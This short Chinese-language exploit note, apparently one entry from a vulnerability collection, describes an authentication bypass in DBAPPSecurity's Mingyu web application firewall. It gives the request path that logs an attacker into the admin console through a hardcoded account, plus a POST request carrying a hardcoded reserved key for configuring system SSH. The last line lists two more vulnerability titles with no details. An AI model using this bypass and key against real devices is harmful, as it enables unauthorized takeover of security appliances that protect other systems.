安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台
登录页面
验证POC
/report.m?a=rpc-timed
再访问主页面跳转配置页面
发送请求包配置系统SSH等
POST /system.m?a=reserved key=!@#dbapp-waf-dev-reserved#@!
佑友防火墙 后台命令执行漏洞 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞